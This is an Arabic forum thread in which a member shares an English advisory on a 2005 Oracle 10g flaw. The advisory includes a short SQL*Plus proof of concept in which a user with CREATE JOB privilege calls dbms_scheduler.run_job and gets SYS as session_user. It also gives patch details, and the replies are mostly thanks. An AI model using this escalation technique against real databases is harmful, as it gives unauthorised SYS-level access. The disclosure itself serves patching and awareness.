إنتقال للمحتوى

  • تسجيل الدخول عبر الفيس بوك تسجيل الدخول عبر تويتر Log In with LinkedIn Log In with Google      تسجيل دخول    
  • إنشاء حساب

صورة
- - - - -

ثغرة في اصدار اوراكل


19 رد (ردود) على هذا الموضوع

#1 -=|mOOdY|=-

-=|mOOdY|=-

    مشرف سابق وعضو مميز

  • المجموعة الماسية
  • 1,324 مشاركة

تاريخ المشاركة 09 January 2007 - 02:35 AM

اثناء تجوالي(بتعرفو انا بسافر كثير :huh: ) في احد المواقع (الاجنبية طبعا لان المعلومة عن الاوراكل في المواقع العربية ستكون هنا اولا) لفت انتباهي موضوع عن وجود ثغرة تمت ترقيتها في 5/ 2005 واحنا ما معنا خبر :) :) :rolleyes:

المهم الثغر مش بسيطة فهي تقوم بتحويلالمستخدم العادي الى اليوزر sys :blink: :blink: نعم sys


وهذا مفاد المقال

DBMS_SCHEDULER SESSION_USER issue in Oracle 10g

Name	 DBMS_SCHEDULER SESSION_USER issue in Oracle 10g
Systems Affected	 Oracle 10g
Severity	 Medium Risk
Category	 Switch Oracle Username to user SYS
Vendor URL	 http://www.oracle.com/
Credit	 Oracle Metalink Forum 633336.995
Exploit	 Forum Entry removed by Oracle
Date	 07 May 2005 (V 1.02)
VU#	 176909

Details

The following proof of concept exploit code (from Metalink) allows any user with CREATE JOB privileges to switch the session_user to SYS. This statement is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security) and could allow privilege escalation. The old deprecated current_user shows the right user.

Example
Connect as a user with CREATE job privilege

SQL> select user from dual;

USER
---------
JOBUSER

SQL> execute dbms_scheduler.run_job('ANY_JOB');

PL/SQL procedure successfully completed.

SQL> select user from dual;

USER
---------
SYS

SQL> select (sys_context('userenv','session_user')) from dual;

USER
---------
SYS

SQL> select (sys_context('userenv','current_user')) from dual;

USER
---------
JOBUSER

SQL> show user

USER is "jobuser"



Patch Information
Apply the patches for Oracle Critical Patch Update October 2005.


History
05-may-2005 US CERT VU# added (V1.01)
07-may-2005 Oracle removed the forum entry from Metalink (V1.02)
18-oct-2005 Oracle released CPU October 2005
تحياتي

تم التعديل بواسطة moody_4u, 28 May 2007 - 08:37 PM.

صورة

!!! كم أنت عبقري !!!


#2 جلال شواقفه

جلال شواقفه

    عضو مميز

  • الأعضــاء
  • 2,559 مشاركة
  • البـلـد: Country Flag

تاريخ المشاركة 09 January 2007 - 10:08 AM

معلومه رائعه جداً...
الصحيح...الكمال لله.... ويكثر خيرك يا مبدع
ارجو من يستفيد من مشاركاتي الدعاء لوالدي ولاموات المسلمين بالمغفره والرحمه......

جلال محمود شواقفه
مدير دائرة الحاسوب
بلدية المفرق الكبرى
المملكه الاردنيه الهاشميه.

#3 مبتدأ

مبتدأ

    عضو

  • الأعضــاء
  • 29 مشاركة

تاريخ المشاركة 09 January 2007 - 12:07 PM

السلام عليكم
شكرا اخي
موضوعك زادني حبا للاوراكل
شكرا جزيلا

#4 -=|mOOdY|=-

-=|mOOdY|=-

    مشرف سابق وعضو مميز

  • المجموعة الماسية
  • 1,324 مشاركة

تاريخ المشاركة 09 January 2007 - 03:06 PM

الجميل تدارك الخطأ وتنزيل الباتش فلم يستغرق ذلك سوى بضعة أيام

صورة

!!! كم أنت عبقري !!!


#5 mrashaideh

mrashaideh

    مشترك

  • الأعضــاء
  • 50 مشاركة
  • البـلـد: Country Flag

تاريخ المشاركة 09 January 2007 - 03:06 PM

And there is some thing else
when i grant sysdba to a user
and when connect using that user as sysdba
when i check for the user show user
i get SYS not th euser i conneted with
is that normal.

#6 Tamer-fujitsu

Tamer-fujitsu

    عضو

  • الأعضــاء
  • 13 مشاركة

تاريخ المشاركة 09 January 2007 - 06:50 PM

شكرا مودى على معلوماتك القيمه ......وياريت متبخلش عننا باى معلومات

#7 مبتدأ

مبتدأ

    عضو

  • الأعضــاء
  • 29 مشاركة

تاريخ المشاركة 09 January 2007 - 09:20 PM

السلام عليكم
انا حاولت اجرب لكن ما قدرت
لو في واحد جرب يورينا

#8 -=|mOOdY|=-

-=|mOOdY|=-

    مشرف سابق وعضو مميز

  • المجموعة الماسية
  • 1,324 مشاركة

تاريخ المشاركة 09 January 2007 - 09:37 PM

اخوي الموضوع واضح... هذا كان في اصدار 10g ما قبل التعديل 10.1.0.3

صورة

!!! كم أنت عبقري !!!


#9 wlahmad

wlahmad

    مشرف سابق وعضو مميز

  • المجموعة الماسية
  • 252 مشاركة

تاريخ المشاركة 12 January 2007 - 11:52 PM

معلومة هامة جدا
نور الله دربك

#10 muneer

muneer

    مشترك

  • الأعضــاء
  • 172 مشاركة

تاريخ المشاركة 13 March 2007 - 06:51 PM

شكرا على المعلومه

#11 mozak

mozak

    مشترك

  • الأعضــاء
  • 91 مشاركة

تاريخ المشاركة 11 April 2007 - 10:35 PM

معلومة أكثر من رائعة

#12 mora_sallam

mora_sallam

    عضو

  • الأعضــاء
  • 7 مشاركة
  • البـلـد: Country Flag

تاريخ المشاركة 06 May 2007 - 04:21 AM

معلومه رائعه جداً...
الصحيح...الكمال لله.... ويكثر خيرك يا مبدع



#13 ahmedb72

ahmedb72

    عضو

  • الأعضــاء
  • 31 مشاركة

تاريخ المشاركة 09 May 2007 - 01:53 PM

الجميل تدارك الخطأ وتنزيل الباتش فلم يستغرق ذلك سوى بضعة أيام


Yest that's normal

#14 amino1

amino1

    عضو نشط

  • الأعضــاء
  • 272 مشاركة
  • الاسم الأول:أمين
  • اسم العائلة:صلاح الدين
  • البـلـد: Country Flag
  • المنصب الحالي:المدير التقني لمؤسسة البوابة المتقدمة

تاريخ المشاركة 09 May 2007 - 03:11 PM

جزاك الله خير ونور بصيرتك :)

اللهم علمنا ما ينفعنا و أنفعنا بما علمتنا

أبو نسيبة

سبحان الله والحمد لله ولا إله إلا الله و الله أكبر
موقع إذاعة طريق الإسلام


#15 O R A C L E

O R A C L E

    عضو

  • الأعضــاء
  • 36 مشاركة

تاريخ المشاركة 28 May 2007 - 07:56 PM

T H A N K 'S

M O O O D y
صورة